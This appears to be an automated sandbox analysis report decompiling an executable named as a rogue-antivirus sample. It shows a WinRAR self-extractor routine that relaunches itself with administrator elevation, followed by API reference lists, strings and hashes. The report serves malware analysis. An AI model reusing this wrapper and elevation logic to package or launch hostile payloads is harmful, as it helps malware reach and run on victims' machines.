                                                                                                                                                  										E0040BF72(_t244, _t258, _t258,  *0x41a818, 2);
                                                                                                                                                  										E0040B2FB(_t244, __eflags, "C:\Users\alfons\Desktop\Endermanch@AnViPC2009.exe", "C:\Users\alfons\Desktop\Endermanch@AnViPC2009.exe"); // executed
                                                                                                                                                  										E0040BF72(_t244, _t258, _t258,  *0x41a818, 6);
                                                                                                                                                  										__eflags =  *0x419f78; // 0x2
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											__eflags =  *0x419f74; // 0x0
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												__eflags =  *0x41a828;
                                                                                                                                                  												if( *0x41a828 == 0) {
                                                                                                                                                  													E0040BF72(_t244, _t258, 0,  *0x41a818, 4); // executed
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										E0040303B(_t258, 1, 1);
                                                                                                                                                  										 *0x419f6c = 0;
                                                                                                                                                  										goto L56;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *0x419f91; // 0x0
                                                                                                                                                  									if(__eflags != 0) {
                                                                                                                                                  										_a11 = 0;
                                                                                                                                                  									}
                                                                                                                                                  									L38:
                                                                                                                                                  									__eflags = _a11;
                                                                                                                                                  									_a11 = _a11 == 0;
                                                                                                                                                  									__eflags = _a11;
                                                                                                                                                  									if(_a11 != 0) {
                                                                                                                                                  										L49:
                                                                                                                                                  										wsprintfA( &_v2640, "\"%s\"\n%s",  &_v1104, E004098D0(0x82));
                                                                                                                                                  										E0040321D(0x414c7c, 1);
                                                                                                                                                  										MessageBoxA(_t258,  &_v2640, E004098D0(0x7e), 0x30);
                                                                                                                                                  										 *0x419f74 =  *0x419f74 + 1;
                                                                                                                                                  										__eflags =  *0x419f74;
                                                                                                                                                  										L50:
                                                                                                                                                  										_push(0);
                                                                                                                                                  										goto L16;
                                                                                                                                                  									}
                                                                                                                                                  									GetModuleFileNameA(0,  &_v2128, 0x400);
                                                                                                                                                  									wsprintfA( &_v5340, "-el -s2 \"-d%s\" \"-p%s\" \"-sp%s\"",  &_v1104, 0x41a792, 0x41a392);
                                                                                                                                                  									_t259 = _t259 + 0x14;
                                                                                                                                                  									_v80.lpFile =  &_v2128;
                                                                                                                                                  									_v80.cbSize = 0x3c;
                                                                                                                                                  									_v80.fMask = 0x40;
                                                                                                                                                  									_v80.hwnd = _t258;
                                                                                                                                                  									_v80.lpVerb = "runas";
                                                                                                                                                  									_v80.lpParameters =  &_v5340;
                                                                                                                                                  									_v80.lpDirectory = 0x412350;
                                                                                                                                                  									_v80.nShow = 1;
                                                                                                                                                  									_v80.hInstApp = 0;
                                                                                                                                                  									_t202 = CreateFileMappingA(0xffffffff, 0, 0x8000004, 0, 0x10000, "winrarsfxmappingfile.tmp");
                                                                                                                                                  									_a12 = _t202;
                                                                                                                                                  									__eflags = _t202;
                                                                                                                                                  									if(_t202 != 0) {
                                                                                                                                                  										_a16 = MapViewOfFile(_t202, 2, 0, 0, 0);
                                                                                                                                                  										_t209 = GetCommandLineA();
                                                                                                                                                  										__eflags = _t209;
                                                                                                                                                  										if(_t209 != 0) {
                                                                                                                                                  											E0040DBC0(_a16, _t209, 0x10000);
                                                                                                                                                  										}
                                                                                                                                                  										UnmapViewOfFile(_a16);
                                                                                                                                                  									}
                                                                                                                                                  									_t204 = ShellExecuteExA( &_v80);
                                                                                                                                                  									__eflags = _t204;
                                                                                                                                                  									if(_t204 == 0) {
                                                                                                                                                  										_a11 = 1;
                                                                                                                                                  									} else {
                                                                                                                                                  										WaitForInputIdle(_v80.hProcess, 0x2710);
                                                                                                                                                  										Sleep(0x1f4);
                                                                                                                                                  										 *0x41a828 = _v80.hProcess;
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _a12;
                                                                                                                                                  									if(_a12 != 0) {
                                                                                                                                                  										CloseHandle(_a12);
                                                                                                                                                  									}
                                                                                                                                                  									__eflags = _a11;
                                                                                                                                                  									if(_a11 == 0) {
                                                                                                                                                  										goto L50;
                                                                                                                                                  									} else {
                                                                                                                                                  										goto L49;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *0x419f91; // 0x0
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _a15;
                                                                                                                                                  								if(_a15 == 0) {
                                                                                                                                                  									goto L38;
                                                                                                                                                  								} else {
                                                                                                                                                  									wsprintfA( &_v2128, "__tmp_rar_sfx_access_check_%u", GetTickCount());
                                                                                                                                                  									_t259 = _t259 + 0xc;
                                                                                                                                                  									E00404E8A( &_v5744);
                                                                                                                                                  									_t217 = E0040519F( &_v5744,  &_v2128, 0, 1); // executed
                                                                                                                                                  									_a15 = _t217;
                                                                                                                                                  									__eflags = _t217;
                                                                                                                                                  									if(_t217 == 0) {
                                                                                                                                                  										_t219 = GetLastError();
                                                                                                                                                  										__eflags = _t219 - 5;
                                                                                                                                                  										if(_t219 == 5) {
                                                                                                                                                  											_a11 = 1;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									E0040503B(0,  &_v5744);
                                                                                                                                                  									goto L35;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_t221 = GetLastError();
                                                                                                                                                  							__eflags = _t221 - 5;
                                                                                                                                                  							if(_t221 == 5) {
                                                                                                                                                  								L24:
                                                                                                                                                  								_a11 = 1;
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t221 - 3;
                                                                                                                                                  							if(_t221 != 3) {
                                                                                                                                                  								goto L25;
                                                                                                                                                  							}
                                                                                                                                                  							goto L24;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *0x419f78 = 2;
                                                                                                                                                  							L56:
                                                                                                                                                  							__eflags =  *0x419f74; // 0x0
                                                                                                                                                  							if(__eflags <= 0) {
                                                                                                                                                  								goto L15;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *0x419f78; // 0x2
                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                  								goto L15;
                                                                                                                                                  							}
                                                                                                                                                  							 *0x419f70 = 1;
                                                                                                                                                  							SetDlgItemTextA(_t258, 1, E004098D0(0x7d));
                                                                                                                                                  							_t182 =  *0x414c7c; // 0x0
                                                                                                                                                  							__eflags = _t182 - 9;
                                                                                                                                                  							if(_t182 != 9) {
                                                                                                                                                  								__eflags = _t182 - 3;
                                                                                                                                                  								_t239 = ((0 | _t182 != 0x00000003) - 0x00000001 & 0x00000005) + 0x7f;
                                                                                                                                                  								__eflags = _t239;
                                                                                                                                                  								_t255 = _t239;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t62 = _t182 + 0x7a; // 0x7a
                                                                                                                                                  								_t255 = _t62;
                                                                                                                                                  							}
                                                                                                                                                  							_t183 = E004098D0(0x7e);
                                                                                                                                                  							MessageBoxA(_t258, E004098D0(_t255), _t183, 0x30);
                                                                                                                                                  							goto L8;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags =  *0x419f68; // 0x0
                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                  							 *0x419f78 = 2;
                                                                                                                                                  						}
                                                                                                                                                  						L15:
                                                                                                                                                  						_push(1);
                                                                                                                                                  						L16:
                                                                                                                                                  						EndDialog(_t258, ??); // executed
                                                                                                                                                  						L8:
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t224 = _t157 - 1;
                                                                                                                                                  				if(_t224 == 0) {
                                                                                                                                                  					__eflags =  *0x419f6c; // 0x0
                                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                                  						L11:
                                                                                                                                                  						 *0x419f78 = 2;
                                                                                                                                                  						goto L50;
                                                                                                                                                  					}
                                                                                                                                                  					 *0x419f78 = 1;
                                                                                                                                                  					__eflags =  *0x419f74; // 0x0
                                                                                                                                                  					if(__eflags != 0) {
                                                                                                                                                  						goto L8;
                                                                                                                                                  					}
                                                                                                                                                  					goto L11;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t224 == 0x64) {
                                                                                                                                                  					_t228 = E00402794(_t258, E004098D0(0x64),  &_v1104);
                                                                                                                                                  					__eflags = _t228;
                                                                                                                                                  					if(_t228 != 0) {
                                                                                                                                                  						SetDlgItemTextA(_t258, 0x65,  &_v1104);
                                                                                                                                                  					}
                                                                                                                                                  					goto L8;
                                                                                                                                                  				}
                                                                                                                                                  				goto L5;
                                                                                                                                                  			}



















































                                                                                                                                                  0x0040cc05
                                                                                                                                                  0x0040cc05
                                                                                                                                                  0x0040cc0d
                                                                                                                                                  0x0040cc14
                                                                                                                                                  0x0040cc2b
                                                                                                                                                  0x0040cc33
                                                                                                                                                  0x0040cc38
                                                                                                                                                  0x0040d08b
                                                                                                                                                  0x0040d090
                                                                                                                                                  0x0040d096
                                                                                                                                                  0x0040d09c
                                                                                                                                                  0x0040d09e
                                                                                                                                                  0x0040d0a9
                                                                                                                                                  0x0040d0a9
                                                                                                                                                  0x0040d0af
                                                                                                                                                  0x0040d0b4
                                                                                                                                                  0x0040d0b6
                                                                                                                                                  0x0040d0c2
                                                                                                                                                  0x0040d0c2
                                                                                                                                                  0x0040d0c9
                                                                                                                                                  0x0040d0d7
                                                                                                                                                  0x0040d0e1
                                                                                                                                                  0x0040d0ef
                                                                                                                                                  0x0040d0f5
                                                                                                                                                  0x0040d0ff
                                                                                                                                                  0x0040d131
                                                                                                                                                  0x0040d137
                                                                                                                                                  0x0040d13a
                                                                                                                                                  0x0040d13c
                                                                                                                                                  0x0040d147
                                                                                                                                                  0x0040d157
                                                                                                                                                  0x0040d160
                                                                                                                                                  0x0040d16b
                                                                                                                                                  0x0040d16e
                                                                                                                                                  0x0040d174
                                                                                                                                                  0x0040d176
                                                                                                                                                  0x0040d17d
                                                                                                                                                  0x0040d17d
                                                                                                                                                  0x0040d18f
                                                                                                                                                  0x0040d13e
                                                                                                                                                  0x0040d143
                                                                                                                                                  0x0040d143
                                                                                                                                                  0x0040d1a1
                                                                                                                                                  0x0040d1b0
                                                                                                                                                  0x0040d1b3
                                                                                                                                                  0x0040d1b8
                                                                                                                                                  0x0040d1be
                                                                                                                                                  0x0040d1c0
                                                                                                                                                  0x0040d1c0
                                                                                                                                                  0x0040d1ca
                                                                                                                                                  0x0040d1d3
                                                                                                                                                  0x0040d1ec
                                                                                                                                                  0x0040d1f2
                                                                                                                                                  0x0040d1f7
                                                                                                                                                  0x0040d1fd
                                                                                                                                                  0x0040d208
                                                                                                                                                  0x0040d208
                                                                                                                                                  0x0040d20d
                                                                                                                                                  0x0040d213
                                                                                                                                                  0x0040d270
                                                                                                                                                  0x0040d270
                                                                                                                                                  0x0040d276
                                                                                                                                                  0x0040d305
                                                                                                                                                  0x0040d305
                                                                                                                                                  0x0040d306
                                                                                                                                                  0x0040d306
                                                                                                                                                  0x0040d30d
                                                                                                                                                  0x0040d313
                                                                                                                                                  0x0040d313
                                                                                                                                                  0x0040d319
                                                                                                                                                  0x0040d31f
                                                                                                                                                  0x0040d325
                                                                                                                                                  0x0040d32e
                                                                                                                                                  0x0040d32e
                                                                                                                                                  0x0040d333
                                                                                                                                                  0x0040d338
                                                                                                                                                  0x0040d33a
                                                                                                                                                  0x0040d33c
                                                                                                                                                  0x0040d342
                                                                                                                                                  0x0040d344
                                                                                                                                                  0x0040d345
                                                                                                                                                  0x0040d346
                                                                                                                                                  0x0040d34b
                                                                                                                                                  0x0040d34c
                                                                                                                                                  0x0040d34e
                                                                                                                                                  0x0040d358
                                                                                                                                                  0x0040d350
                                                                                                                                                  0x0040d350
                                                                                                                                                  0x0040d350
                                                                                                                                                  0x0040d34e
                                                                                                                                                  0x0040d342
                                                                                                                                                  0x0040d35e
                                                                                                                                                  0x0040d364
                                                                                                                                                  0x0040d370
                                                                                                                                                  0x0040d370
                                                                                                                                                  0x0040d376
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d376
                                                                                                                                                  0x0040d284
                                                                                                                                                  0x0040d289
                                                                                                                                                  0x0040d28e
                                                                                                                                                  0x0040d290
                                                                                                                                                  0x0040d292
                                                                                                                                                  0x0040d298
                                                                                                                                                  0x0040d29a
                                                                                                                                                  0x0040d2aa
                                                                                                                                                  0x0040d2b5
                                                                                                                                                  0x0040d2b5
                                                                                                                                                  0x0040d298
                                                                                                                                                  0x0040d2bc
                                                                                                                                                  0x0040d2bd
                                                                                                                                                  0x0040d2c3
                                                                                                                                                  0x0040d2f4
                                                                                                                                                  0x0040d2fc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d2c5
                                                                                                                                                  0x0040d2d7
                                                                                                                                                  0x0040d2dd
                                                                                                                                                  0x0040d2df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d2e3
                                                                                                                                                  0x0040d2e9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d2e9
                                                                                                                                                  0x0040d215
                                                                                                                                                  0x0040d215
                                                                                                                                                  0x0040d21b
                                                                                                                                                  0x0040d220
                                                                                                                                                  0x0040d22c
                                                                                                                                                  0x0040d23f
                                                                                                                                                  0x0040d244
                                                                                                                                                  0x0040d245
                                                                                                                                                  0x0040d245
                                                                                                                                                  0x0040d24d
                                                                                                                                                  0x0040d253
                                                                                                                                                  0x0040d255
                                                                                                                                                  0x0040d26b
                                                                                                                                                  0x0040d26b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d253
                                                                                                                                                  0x0040d213
                                                                                                                                                  0x0040cc3f
                                                                                                                                                  0x0040cc50
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc50
                                                                                                                                                  0x0040cc45
                                                                                                                                                  0x0040cc46
                                                                                                                                                  0x0040ccc0
                                                                                                                                                  0x0040ccc6
                                                                                                                                                  0x0040cccc
                                                                                                                                                  0x0040cceb
                                                                                                                                                  0x0040ccf1
                                                                                                                                                  0x0040cd05
                                                                                                                                                  0x0040cd0b
                                                                                                                                                  0x0040cd0e
                                                                                                                                                  0x0040cd14
                                                                                                                                                  0x0040cd25
                                                                                                                                                  0x0040cd35
                                                                                                                                                  0x0040cd35
                                                                                                                                                  0x0040cd3a
                                                                                                                                                  0x0040cd49
                                                                                                                                                  0x0040cd4c
                                                                                                                                                  0x0040cd57
                                                                                                                                                  0x0040cd59
                                                                                                                                                  0x0040cd6b
                                                                                                                                                  0x0040cd72
                                                                                                                                                  0x0040cd78
                                                                                                                                                  0x0040cd7a
                                                                                                                                                  0x0040cd7e
                                                                                                                                                  0x0040cd81
                                                                                                                                                  0x0040cd83
                                                                                                                                                  0x0040cd85
                                                                                                                                                  0x0040cd88
                                                                                                                                                  0x0040cd8a
                                                                                                                                                  0x0040cd8a
                                                                                                                                                  0x0040cd88
                                                                                                                                                  0x0040cd8e
                                                                                                                                                  0x0040cd93
                                                                                                                                                  0x0040cd95
                                                                                                                                                  0x0040cdfd
                                                                                                                                                  0x0040cdfd
                                                                                                                                                  0x0040ce00
                                                                                                                                                  0x0040cf88
                                                                                                                                                  0x0040cf94
                                                                                                                                                  0x0040cf9a
                                                                                                                                                  0x0040cfa3
                                                                                                                                                  0x0040cfab
                                                                                                                                                  0x0040cfb9
                                                                                                                                                  0x0040cfc7
                                                                                                                                                  0x0040cfd6
                                                                                                                                                  0x0040cfe4
                                                                                                                                                  0x0040cfe9
                                                                                                                                                  0x0040cfef
                                                                                                                                                  0x0040cff1
                                                                                                                                                  0x0040cff7
                                                                                                                                                  0x0040cff9
                                                                                                                                                  0x0040cfff
                                                                                                                                                  0x0040d00a
                                                                                                                                                  0x0040d00a
                                                                                                                                                  0x0040cfff
                                                                                                                                                  0x0040cff7
                                                                                                                                                  0x0040d012
                                                                                                                                                  0x0040d017
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d017
                                                                                                                                                  0x0040ce06
                                                                                                                                                  0x0040ce0c
                                                                                                                                                  0x0040ce0e
                                                                                                                                                  0x0040ce0e
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x0040ce11
                                                                                                                                                  0x0040ce14
                                                                                                                                                  0x0040ce18
                                                                                                                                                  0x0040ce1b
                                                                                                                                                  0x0040cf2a
                                                                                                                                                  0x0040cf48
                                                                                                                                                  0x0040cf58
                                                                                                                                                  0x0040cf6f
                                                                                                                                                  0x0040cf75
                                                                                                                                                  0x0040cf75
                                                                                                                                                  0x0040cf7b
                                                                                                                                                  0x0040cf7b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cf7b
                                                                                                                                                  0x0040ce2e
                                                                                                                                                  0x0040ce51
                                                                                                                                                  0x0040ce57
                                                                                                                                                  0x0040ce71
                                                                                                                                                  0x0040ce7d
                                                                                                                                                  0x0040ce84
                                                                                                                                                  0x0040ce8b
                                                                                                                                                  0x0040ce8e
                                                                                                                                                  0x0040ce95
                                                                                                                                                  0x0040ce98
                                                                                                                                                  0x0040ce9f
                                                                                                                                                  0x0040cea6
                                                                                                                                                  0x0040cea9
                                                                                                                                                  0x0040ceaf
                                                                                                                                                  0x0040ceb2
                                                                                                                                                  0x0040ceb4
                                                                                                                                                  0x0040cec2
                                                                                                                                                  0x0040cec5
                                                                                                                                                  0x0040cecb
                                                                                                                                                  0x0040cecd
                                                                                                                                                  0x0040ced4
                                                                                                                                                  0x0040ced4
                                                                                                                                                  0x0040cedc
                                                                                                                                                  0x0040cedc
                                                                                                                                                  0x0040cee6
                                                                                                                                                  0x0040ceec
                                                                                                                                                  0x0040ceee
                                                                                                                                                  0x0040cf13
                                                                                                                                                  0x0040cef0
                                                                                                                                                  0x0040cef8
                                                                                                                                                  0x0040cf03
                                                                                                                                                  0x0040cf0c
                                                                                                                                                  0x0040cf0c
                                                                                                                                                  0x0040cf17
                                                                                                                                                  0x0040cf1a
                                                                                                                                                  0x0040cf1f
                                                                                                                                                  0x0040cf1f
                                                                                                                                                  0x0040cf25
                                                                                                                                                  0x0040cf28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cf28
                                                                                                                                                  0x0040cd97
                                                                                                                                                  0x0040cd9d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cd9f
                                                                                                                                                  0x0040cda2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cda4
                                                                                                                                                  0x0040cdb7
                                                                                                                                                  0x0040cdbd
                                                                                                                                                  0x0040cdc6
                                                                                                                                                  0x0040cddb
                                                                                                                                                  0x0040cde0
                                                                                                                                                  0x0040cde3
                                                                                                                                                  0x0040cde5
                                                                                                                                                  0x0040cde7
                                                                                                                                                  0x0040cde9
                                                                                                                                                  0x0040cdec
                                                                                                                                                  0x0040cdee
                                                                                                                                                  0x0040cdee
                                                                                                                                                  0x0040cdec
                                                                                                                                                  0x0040cdf8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cdf8
                                                                                                                                                  0x0040cda2
                                                                                                                                                  0x0040cd5b
                                                                                                                                                  0x0040cd5d
                                                                                                                                                  0x0040cd60
                                                                                                                                                  0x0040cd67
                                                                                                                                                  0x0040cd67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cd67
                                                                                                                                                  0x0040cd62
                                                                                                                                                  0x0040cd65
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040ccf3
                                                                                                                                                  0x0040ccf3
                                                                                                                                                  0x0040d01d
                                                                                                                                                  0x0040d01d
                                                                                                                                                  0x0040d023
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d029
                                                                                                                                                  0x0040d02f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d03a
                                                                                                                                                  0x0040d048
                                                                                                                                                  0x0040d04e
                                                                                                                                                  0x0040d053
                                                                                                                                                  0x0040d056
                                                                                                                                                  0x0040d05f
                                                                                                                                                  0x0040d069
                                                                                                                                                  0x0040d069
                                                                                                                                                  0x0040d06c
                                                                                                                                                  0x0040d058
                                                                                                                                                  0x0040d058
                                                                                                                                                  0x0040d058
                                                                                                                                                  0x0040d058
                                                                                                                                                  0x0040d072
                                                                                                                                                  0x0040d080
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040d080
                                                                                                                                                  0x0040ccce
                                                                                                                                                  0x0040ccce
                                                                                                                                                  0x0040ccd4
                                                                                                                                                  0x0040ccd6
                                                                                                                                                  0x0040ccd6
                                                                                                                                                  0x0040cce0
                                                                                                                                                  0x0040cce0
                                                                                                                                                  0x0040cce2
                                                                                                                                                  0x0040cce3
                                                                                                                                                  0x0040cc80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc82
                                                                                                                                                  0x0040cccc
                                                                                                                                                  0x0040cc48
                                                                                                                                                  0x0040cc49
                                                                                                                                                  0x0040cc88
                                                                                                                                                  0x0040cc8e
                                                                                                                                                  0x0040cca2
                                                                                                                                                  0x0040cca2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cca2
                                                                                                                                                  0x0040cc90
                                                                                                                                                  0x0040cc9a
                                                                                                                                                  0x0040cca0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cca0
                                                                                                                                                  0x0040cc4e
                                                                                                                                                  0x0040cc67
                                                                                                                                                  0x0040cc6c
                                                                                                                                                  0x0040cc6e
                                                                                                                                                  0x0040cc7a
                                                                                                                                                  0x0040cc7a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040cc6e
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040CC7A
                                                                                                                                                  • GetDlgItemTextA.USER32 ref: 0040CCC0
                                                                                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0040CCE3
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040CD05
                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040CD25
                                                                                                                                                  • SendMessageA.USER32(?,000000C2,00000000,004125AA), ref: 0040CD35
                                                                                                                                                  • SetFocus.USER32(?), ref: 0040CD3A
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000), ref: 0040CD5B
                                                                                                                                                  • SetCurrentDirectoryA.KERNELBASE(?,?,00000000,00000000), ref: 0040CD72
                                                                                                                                                  • GetLastError.KERNEL32(?), ref: 0040CD83
                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040CDA4
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CDB7
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000001), ref: 0040CDE7
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,?), ref: 0040CE2E
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CE51
                                                                                                                                                  • CreateFileMappingA.KERNEL32 ref: 0040CEA9
                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 0040CEBC
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040CEC5
                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?), ref: 0040CEDC
                                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C), ref: 0040CEE6
                                                                                                                                                  • WaitForInputIdle.USER32 ref: 0040CEF8
                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040CF03
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0040CF1F
                                                                                                                                                  • wsprintfA.USER32 ref: 0040CF48
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040CF6F
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040D048
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040D080
                                                                                                                                                  • SendMessageA.USER32(?,00000080,00000001,000203FD), ref: 0040D0A9
                                                                                                                                                  • SendDlgItemMessageA.USER32(?,00000069,00000172,00000000,B6050A85), ref: 0040D0C2
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040D0D1
                                                                                                                                                  • GetWindowRect.USER32 ref: 0040D0E1
                                                                                                                                                  • MapWindowPoints.USER32 ref: 0040D0EF
                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 0040D0FF
                                                                                                                                                  • CreateWindowExA.USER32 ref: 0040D131
                                                                                                                                                  • SetMenu.USER32(?,00000067), ref: 0040D143
                                                                                                                                                  • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000203), ref: 0040D157
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 0040D160
                                                                                                                                                  • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040D16E
                                                                                                                                                  • SendMessageA.USER32(?,00000030,00000000,00000000), ref: 0040D17D
                                                                                                                                                  • DialogBoxParamA.USER32 ref: 0040D2D7
                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 0040D2E9
                                                                                                                                                    • Part of subcall function 0040BF72: lstrcmpiA.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,0040D289,?,00000000,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 0040C00B
                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 0040D313
                                                                                                                                                  • SendMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D350
                                                                                                                                                  • PostMessageA.USER32(?,00000111,00000001,00000000), ref: 0040D358
                                                                                                                                                  • SendMessageA.USER32(?,00000435,00000000,00400000), ref: 0040D18F
                                                                                                                                                    • Part of subcall function 004098D0: LoadStringA.USER32 ref: 0040991F
                                                                                                                                                    • Part of subcall function 004098D0: LoadStringA.USER32 ref: 00409931
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?), ref: 0040D1A1
                                                                                                                                                  • GetDlgItem.USER32 ref: 0040D1AA
                                                                                                                                                  • SetWindowTextA.USER32(?,00419F92), ref: 0040D1CA
                                                                                                                                                  • SetDlgItemTextA.USER32 ref: 0040D370
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Message$ItemSend$Window$Text$File$ErrorLastwsprintf$CreateCurrentDialogDirectoryLoadMenuStringView$CallbackCloseCommandCountDestroyDispatcherEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamPointsPostRectShellSleepTickUnmapUserWaitlstrcmpi
                                                                                                                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$@Mhv$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$C:\Users\user\Desktop\Endermanch@AnViPC2009.exe$LICENSEDLG$P#A$RichEdit$STARTDLG$__tmp_rar_sfx_access_check_%u$`'A$winrarsfxmappingfile.tmp$|LA
                                                                                                                                                  • API String ID: 475857596-2217255394
                                                                                                                                                  • Opcode ID: 7f7c909fd5e84e45b110edb60874e849ca1f456bbc3f5cfd10764e9eb3943983
                                                                                                                                                  • Instruction ID: 831237b8f99e569c4bac353761fa719156e54ecd1e64a15b4798033b6d8f8366
                                                                                                                                                  • Opcode Fuzzy Hash: 7f7c909fd5e84e45b110edb60874e849ca1f456bbc3f5cfd10764e9eb3943983
                                                                                                                                                  • Instruction Fuzzy Hash: BC12AF71941209FBDB21AFA09D85EEF3A69EB05304F00803AF605E21D1C7B84D66DB6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                  			E0040D37F() {
                                                                                                                                                  				char _v12;
                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				void* _t18;
                                                                                                                                                  				int _t28;
                                                                                                                                                  				void* _t34;
                                                                                                                                                  				void* _t59;
                                                                                                                                                  				struct HINSTANCE__* _t61;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				CHAR* _t63;
                                                                                                                                                  				void* _t66;
                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                  				intOrPtr _t72;
                                                                                                                                                  				int _t75;
                                                                                                                                                  				intOrPtr _t76;
                                                                                                                                                  
                                                                                                                                                  				__imp__OleInitialize(0); // executed
                                                                                                                                                  				E0040E4FC(0x41fdc0);
                                                                                                                                                  				_t63 = GetCommandLineA();
                                                                                                                                                  				_t67 = _t63;
                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                  					L8:
                                                                                                                                                  					GetModuleFileNameA(0, 0x419ad8, 0x400);
                                                                                                                                                  					SetEnvironmentVariableA("sfxname", 0x419ad8); // executed
